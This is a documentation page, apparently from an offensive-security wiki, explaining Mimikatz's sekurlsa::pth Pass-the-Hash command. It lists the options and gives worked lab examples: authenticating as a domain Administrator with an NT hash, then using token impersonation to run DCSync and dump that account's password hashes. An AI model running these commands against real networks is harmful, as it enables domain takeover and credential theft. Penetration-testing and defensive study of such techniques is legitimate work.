pth
sekurlsa::pth performs Pass-the-Hash, Pass-the-Key and Over-Pass-the-Hash. Upon successful authentication, a program is run (n.b. defaulted to cme.exe). It has the following command line arguments:
  • /user : the username to impersonate. It must be noted that Administrator is not the only name for this well-known account.
  • /domain : the fully qualified domain name. If Active Directory domain services are not in use or in case of local user/admin, a computer or a server name, workgroup can be used.
  • /rc4 or /ntlm : the RC4 key / NT hash (derived of the user's password).
  • /aes128 : the AES128 key derived from the user's password and the realm of the domain.
  • /aes256 : the AES256 key derived from the user's password and the realm of the domain.
  • /run : the command line to run (defaulted to cmd.exe).
  • /luid : locally unique identifier. According to Microsoft, the locally unique identifier (LUID) is a 64-bit value guaranteed to be unique only on the system on which it was generated. The uniqueness of an LUID is guaranteed only until the system is restarted.
  • /impersonate : It performs user token impersonation. It must be noted that a new process is not spawned but the token is injected on the process running Mimikatz.
LM and NT hashes are used to authenticate accounts using the NTLM protocol. These hashes are often called NTLM hash and many documentations, resources, blogpost and tools mix terms. In this case, "ntlm" refers to the NT hash.
Doing Pass-the-Hash on a Windows system requires specific privilege. It either requires elevated privileges (by previously running privilege::debug or by executing Mimikatz as the NT-AUTHORITY\SYSTEM account). This doesn't apply to Pass-The-Ticket which uses an official API.
1
mimikatz # sekurlsa::pth /user:Administrator /domain:hacklab.local /ntlm:b09a14d2d325026f8986d4a874fbcbc7
2
user : Administrator
3
domain : hacklab.local
4
program : cmd.exe
5
impers. : no
6
NTLM : b09a14d2d325026f8986d4a874fbcbc7
7
| PID 5896
8
| TID 4620
9
| LSA Process is now R/W
10
| LUID 0 ; 82772120 (00000000:04ef0098)
11
\_ msv1_0 - data copy @ 0000023A0E8BD5C0 : OK !
12
\_ kerberos - data copy @ 0000023A0E9FF5A8
13
\_ des_cbc_md4 -> null
14
\_ des_cbc_md4 OK
15
\_ des_cbc_md4 OK
16
\_ des_cbc_md4 OK
17
\_ des_cbc_md4 OK
18
\_ des_cbc_md4 OK
19
\_ des_cbc_md4 OK
20
\_ *Password replace @ 0000023A0E941CE8 (32) -> null
Copied!
Pass the Hash

With token impersonation

As can be seen in the following output the hacklab\optimus user is a low privileged user in the HACKLAB.LOCAL active directory domain:
1
C:\Users\optimus>net user optimus /domain
2
The request will be processed at a domain controller for domain hacklab.local.
3
​
4
User name optimus
5
Full Name optimus prime
6
Comment
7
User's comment
8
Country/region code 000 (System Default)
9
Account active Yes
10
Account expires Never
11
​
12
Password last set 18/10/2021 15:39:30
13
Password expires Never
14
Password changeable 19/10/2021 15:39:30
15
Password required Yes
16
User may change password Yes
17
​
18
Workstations allowed All
19
Logon script
20
User profile
21
Home directory
22
Last logon 18/10/2021 15:56:39
23
​
24
Logon hours allowed All
25
​
26
Local Group Memberships
27
Global Group memberships *Domain Users
28
The command completed successfully.
Copied!
An attempt to DCSync with his credentials will result in the following:
1
mimikatz # lsadump::dcsync /user:Administrator
2
[DC] 'hacklab.local' will be the domain
3
[DC] 'DC.hacklab.local' will be the DC server
4
[DC] 'Administrator' will be the user account
5
[rpc] Service : ldap
6
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
7
ERROR kuhl_m_lsadump_dcsync ; GetNCChanges: 0x000020f7 (8439)
Copied!
However, by using the /impersonate option, DCSync can be performed without spawning a new window:
1
mimikatz # sekurlsa::pth /user:Administrator /domain:hacklab.local /ntlm:b09a14d2d325026f8986d4a874fbcbc7 /impersonate
2
user : Administrator
3
domain : hacklab.local
4
program : C:\Users\Public\x64\mimikatz.exe
5
impers. : yes
6
NTLM : b09a14d2d325026f8986d4a874fbcbc7
7
| PID 7368
8
| TID 3204
9
| LSA Process is now R/W
10
| LUID 0 ; 86889532 (00000000:052dd43c)
11
\_ msv1_0 - data copy @ 0000023A0E8BD7B0 : OK !
12
\_ kerberos - data copy @ 0000023A0E9FE8E8
13
\_ des_cbc_md4 -> null
14
\_ des_cbc_md4 OK
15
\_ des_cbc_md4 OK
16
\_ des_cbc_md4 OK
17
\_ des_cbc_md4 OK
18
\_ des_cbc_md4 OK
19
\_ des_cbc_md4 OK
20
\_ *Password replace @ 0000023A0E96C0E8 (32) -> null
21
** Token Impersonation **
Copied!
1
mimikatz # lsadump::dcsync /user:Administrator
2
[DC] 'hacklab.local' will be the domain
3
[DC] 'DC.hacklab.local' will be the DC server
4
[DC] 'Administrator' will be the user account
5
[rpc] Service : ldap
6
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
7
​
8
Object RDN : Administrator
9
​
10
** SAM ACCOUNT **
11
​
12
SAM Username : Administrator
13
Account Type : 30000000 ( USER_OBJECT )
14
User Account Control : 00000200 ( NORMAL_ACCOUNT )
15
Account expiration : 01/01/1601 01:00:00
16
Password last change : 24/09/2021 16:24:41
17
Object Security ID : S-1-5-21-2725560159-1428537199-2260736313-500
18
Object Relative ID : 500
19
​
20
Credentials:
21
Hash NTLM: b09a14d2d325026f8986d4a874fbcbc7
22
ntlm- 0: b09a14d2d325026f8986d4a874fbcbc7
23
ntlm- 1: a06b19f88e0432e937a67fb6848e56bd
24
​
25
...Output Omitted...
Copied!
According to Benjamin the following must be taken into consideration:
  • This command does not work with minidumps (nonsense)
  • this new version of 'Pass-The-Hash' replaces RC4 keys of Kerberos by the NT hash (and/or replaces AES keys). It allows the Kerberos provider to ask TGT tickets.
  • NT hash is mandatory on XP/2003/Vista/2008 and before 7/2008r2/8/2012 kb2871997 (AES not available or replaceable)
  • AES keys can be replaced only on 8.1/2012r2 or 7/2008r2/8/2012 with kb2871997, in this case an NT hash is not required.
Last modified 6mo ago
Copy link